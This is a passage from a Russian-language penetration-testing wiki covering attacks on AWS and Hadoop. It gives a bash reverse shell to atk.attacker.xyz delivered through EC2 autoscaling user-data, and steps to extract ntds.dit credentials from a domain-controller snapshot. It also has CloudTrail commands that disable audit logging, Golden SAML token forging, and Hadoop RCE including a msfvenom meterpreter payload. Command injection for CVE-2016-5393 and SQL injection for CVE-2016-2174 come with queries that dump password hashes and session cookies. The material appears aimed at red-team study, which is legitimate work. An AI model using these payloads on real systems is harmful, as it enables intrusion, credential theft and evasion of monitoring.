<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Hadoop

2022-09-16T11:57:35Z

Drakylar: /* Admin service */

= Общее =

== Получение конфига ==

Несколько вариантов получения конфига Hadoop. Он может потребоваться для работы с ним через CLI. Конфиг обычно в формате XML.

=== Сервисы ===

==== WebUI ====

Для этого требуется перейти на один из следующих веб серверов на страницу /conf:

* HDFS WebUI (много потов)
* JobHistory (19888, 19890) - в приоритете
* ResourceManager (8088, 8090)
. . .

=== Уязвимости ===

Иногда конфиг можно скачать используя уязвимости ПО.

==== Cloudera Manager ====

Конфиг будет доступен по следующему адресу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
http://<cloudera_mgr_ip>:7180/cmf/services/<service_id_to_iterate>/client-config
</syntaxhighlight>

service_id_to_iterate - можно получить перебором 0-100(или больше).

=== Автоматически ===

==== HadoopSnooper ====

https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/hadoopsnooper.py

Позволяет скачать файлы конфига:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

== Аутентификация ==

По-умолчанию simple (то есть отключена, можно выдавать себя за любого). Можно переключить на kerberos. За это отвечает параметр в конфиге hadoop.security.authentication.

== Шифрование ==

По-умолчанию отключено для передачи (in-transit) и хранения (at-rest).

=== NameNode ===

Для общения с NameNode могут быть использованы следующие механизмы аутентификации:

- GSS-API

- Digest-MD5

=== Web Apps ===

Как правило, используется SSL/TLS.

=== DataNodes ===

Шифрование может быть на 2 уровнях:

1. обмен ключами используя 3DES или RC4

2. Шифрование используя AES 128(default)/192/256.

=== At-rest ===

Означает хранилище файлов. Если кратко:

* Данные шифруются DEK-ключем (Data Encryption Key)

* DEK зашифрован ключем EZ (Encryption Zone) -> EDEK (Encrypted Data Encryption Key)

Обратный процесс:

* EDEK запрашивается у NameNode

* Запрашиваем KMS расшифровать EDEK - получаем DEK

* Расшифровываем или зашифровываем данные с DEK.

Важно! Чтобы запросить ключ у KMS, в случае использования Access Control List (ACL) нужны привилегии.

== Поиск сервисов ==

=== nmap ===

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
nmap -sV -Pn --open -v -p ПОРТЫ_ТУТ --scripts "*hadoop* or *hbase* or *flume*" АДРЕСА
</syntaxhighlight>

== Общие атаки ==

=== Node RCE ===

Для этого требуется получить конфиг и настроить hadoop cli.

path_to_hadoop_streaming.jar - файл, который развертывается на нодах. Обычно он уже есть в установленном hadoop-cli по адресу /share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar

Создаем задачу MapReduce:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop jar <path_to_hadoop_streaming.jar> \
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "/bin/cat /etc/passwd" \
-reducer NONE
</syntaxhighlight>

Читаем результат команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop fs –ls /output_directory_on_HDFS
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Также результат команды можно увидеть в WebUI в консоли созданной задачи.

Из интересного: нельзя выбрать ноду, на которой запускается задача. Поэтому требуется запускать команду много раз, пока она не запустится на нужной.

Бонус: эксплоит можно сгенерировать с msfvenom:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.38.1 -f elf -o msf.payload

hadoop jar <path_to_hadoop_streaming.jar>
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "./msf.payload" \
-reducer NONE \
-file msf.payload \
-background
</syntaxhighlight>

=== RCE - CVE-2016-5393 ===

'''Уязвимая версия:''' Hadoop 2.6.x < 2.6.5 and 2.7.x < 2.7.3

'''Требования:''' должен быть авторизован и у кластера должны быть включены параметры "org.apache.hadoop.security.ShellBasedUnixGroupsMapping" и "hadoop.security.group.mapping" (конфиг core-site.xml)

Cуть в том, что функция получения групп для пользователя не экранирует специальные символы и вставляет строку в "bash -c":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hdfs groups '$(ping 127.0.0.1)'
</syntaxhighlight>

Второй вариант - через WebHDFS. Но для этого требуется "Simple Auth":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
.../?user.name=$(ping+127.0.0.1)
</syntaxhighlight>

Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Hadoop%20components%20vulnerabilities/Hadoop%20Common/CVE-2016-5393%20-%20Authenticated%20command%20execution%20as%20the%20hdfs%20user

= HDFS =

HDFS (Hadoop FileSystem) - это виртуальная файловая система Hadoop, доступная по сети.

== Сервисы ==

=== MasterNode (NameNode) WebUI ===

Это веб-интерфейс, запущенный на портах 50070(http) и 50470(https). Обычно на нем отсутствует аутентификация, поэтому его можно использовать для доступа к файловой системе.

Основная страница доступна по адресу /explorer.html, а при выборе даты перенаправляет на соответствующую DataNode (порт 50075).

=== MasterNode Metadata Service ===

Использует протокол IPC на портах 8020 и 9000. Требуется для взаимодействия с метадатой файлов HDFS.

Команды для взаимодействия:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Получение списка файлов (и их метадаты)
hadoop fs -ls /tmp
</syntaxhighlight>

=== DataNode WebUI ===

Веб-интерфейс для доступа к статусу, логам и тд. Запускается на 50075(http) и 50475(https) портах.

Доступно по пути /browseDirectory.jsp

==== hdfsbrowser.py ====
Для взаимодействия с ним можно воспользоваться скриптом https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake :

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# В скрипте также можно указать порт, протокол
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

Интересно, что утилита автоматически подставляет нужного пользователя - владельца файла или ноды.

==== hadoop cli ====

Для получения списка файлов требуется в переменной окружения "HADOOP_USER_NAME" указать нужного пользователя, например, root или hbase:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
export HADOOP_USER_NAME=hbase
hadoop fs -ls /hbase
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Для этого может потребоваться конфиг hadoop (в основной главе)

=== DataNode Data Transfer ===

Сервис для передачи данных в DataNode. Использует порт 50010

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Отправить файл на HDFS
hadoop fs -put <localfile> <remotedst>
</syntaxhighlight>

=== DataNode Metadata Service ===

Использует протокол IPC на порту 50020. Требуется для взаимодействия с метадатой файлов HDFS.

=== Secondary Node Checkpoint Service (Secondary NameNode WebUI) ===

Запущен на порту 50090 по протоколу http. Как понял используется для сохранения данных метадаты (запасное хранилище).

= YARN =

== Интерфейсы (сервисы) ==

=== Application Manager ===

Порт(tcp): 8032

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.address

=== Scheduler ===

Порт(tcp): 8030

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.scheduler.address

=== ResourceManager Web Application ===

Порт(tcp): 8088, 8090

Протокол: http(8088), https(8090)

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.webapp.address, yarn.resourcemanager.webapp.https.address

=== ResourceManager Tracker ===

Порт(tcp): 8031

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.resource-tracker.address

=== ResourceManager Admin ===

Порт(tcp): 8033

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.admin.address

=== NodeManager СontainerManager ===

Порт(tcp): 0

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.address

=== NodeManager Localizer ===

Порт(tcp): 8040

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.localizer.address

=== NodeManager Collector Service ===

Порт(tcp): 8048

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.collector-service.address

=== NodeManager WebUI ===

Порт(tcp): 8042, 8044

Протокол: http(8042), https(8044)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.webapp.address, yarn.nodemanager.webapp.https.address

=== NodeManager Timeline RPC ===

Порт(tcp): 10200

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.address

=== NodeManager Timeline WebUI ===

Порт(tcp): 8188, 8190

Протокол: http(8188), https(8190)

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.webapp.address, yarn.timeline-service.webapp.https.address

=== SharedCacheManager Admin ===

Порт(tcp): 8047

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.admin.address

=== SharedCacheManager WebUI ===

Порт(tcp): 8788

Протокол: ???(http)

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.webapp.address

=== SharedCacheManager Node Manager ===

Порт(tcp): 8046

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.uploader.server.address

=== SharedCacheManager Client ===

Порт(tcp): 8045

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.sharedcache.client-server.address

=== NodeManager AMRMProxyService ===

Порт(tcp): 8049

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.amrmproxy.address

=== Router WebUI ===

Порт(tcp): 8089, 8091

Протокол: http(8089), https(8091)

Аутентификация: ???

Параметр в конфиге : yarn.router.webapp.address, yarn.router.webapp.https.address

=== HttpFS (Hadoop HDFS over HTTP) ===

Порт(tcp): 14000, 14001

Протокол: http(14000), 14001(https)

Аутентификация: ???

= Apache HBASE =

= ZooKeeper =

= Apache Ambari =

Нужен для упрощения управления кластерами Hadoop, используя WebUI. Есть возможность интегрироваться с другими приложениями по REST API.

Из интересного:

- Все могут авторизоваться (даже стандартные юзеры)

- Нет защиты (directory listing, no cookie flags, no CSRF)

- CVE-2015-1775 - /logs/ логи

== Сервисы ==

=== WebUI ===

Общение по протоколу http (порт 8080) и https (порт 8440).

=== Registration/Heartbeat ===

Общение по протоколу https на порту 8441.

=== Agent ===

Порт 8670/tcp используется для Ping.

= Apache Spark =

= Apache Kafka/Storm =

= Apache HIVE / DRILL =

= Mahout =

= Apache Solr / Lucene =

= Apache Ranger =

Компонент безопасности Hadoop с открытым исходным кодом.

Из интересного:

- Поддержка Kerberos

- REST API

- Журналы аудита

- Модель разрешений на основе политики доступа (политики, юзеры, группы)

Интересные ИБ-проблемы:

- Slow HTTP DOS

- Все юзеры могут авторизоваться в Ranger (но не все - выполнять действия)

- CVE-2015-0266 - Missing function level access control, можно использовать для повышения привилегий

- CVE-2015-0265 - XSS в UserAgent

TODO: изучить как работает

https://ranger.apache.org/apidocs/index.html - API документация

== Сервисы ==

=== Admin WebUI ===

Порт: 6080, 6182

Протокол: http(6180),https(6182)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

==== Уязвимости ====

* Скачивание политик без аутентификации. Но нужно знать имя политики. (версия меньше или равна 0.5.2)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/download/<policy_name>
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/Unauthenticated%20policy%20download

* CVE-2016-2174 - SQL injection.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/eventTime?eventTime=' or '1'='1&policyId=1

# post-exploitation: скачать хеши паролей пользователей (md5 или sha512):
select last_name, first_name, email, login_id, password, user_role from x_portal_user, x_portal_user_role where x_portal_user.id = x_portal_user_role.user_id limit 3

# post-exploitation: скачать сессии(куки) пользователей):
select auth_time, login_id, ext_sess_id from x_auth_sess where auth_status = 1 or (login_id like '%admin%' and auth_status = 1) order by auth_time desc limit 3
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/CVE-2016-2174%20-%20Authenticated%20SQL%20injection

=== UNIX Auth Service ===

Порт: 5151

Протокол: SSL/TCP

Параметр конфига: ranger.usersync.port

=== Ranger KMS ===

Порт: 9292, 9293

Протокол: http(9292), https(9293)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

=== Solr Audit ===

Порт: 6083, 6183

Протокол: http(6083), https(6183)

Параметр конфига: ranger-admin (???)

= OOZIE =

Серверная система планирования рабочих процессов для управления заданиями Hadoop. Рабочие процессы в Oozie определяются как набор потоков управления и узлов действий в ориентированном ациклическом графе.

== Сервисы ==

=== Web Console ===

Порт: 11000, 11443

Протокол: HTTP(11000), HTTPS(11443)

=== Admin service ===

Порт: 11001

Протокол: ???

= PIG =

= Apache Hue =

Облачный редактор SQL с открытым исходным кодом. Упоминается тут тк часто используется вместе с Hadoop. Использует порт 8888 по протоколу HTTP.

В старых версиях также присутствует DOM XSS, включена отладка, есть заголовок X-Frame-Options: ALLOWALL.

= MapReduce =

Модель распределённых вычислений от компании Google, используемая в технологиях Big Data для параллельных вычислений над очень большими (до нескольких петабайт) наборами данных в компьютерных кластерах, и фреймворк для вычисления распределенных задач на узлах (node) кластера

== Сервисы ==

=== Jobhistory ===

Порт: 10020

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.address

=== JobTracker ===

Порт: 8021

Протокол: IPC

Аутентификация: ???

Параметр конфига: mapred.job.tracker

Доступно только в MapReduce v1

=== JobTracker WebUI v1 ===

Порт: 50030

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.job.tracker.http.address

Доступно только в MapReduce v1

=== Jobhistory WebUI v2 ===

Порт: 19888, 19890

Протокол: HTTP(19888), HTTPS(19890)

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.address, mapreduce.jobhistory.webapp.https.address

Доступен только в MapReduce v2

=== Jobhistory Shufflee ===

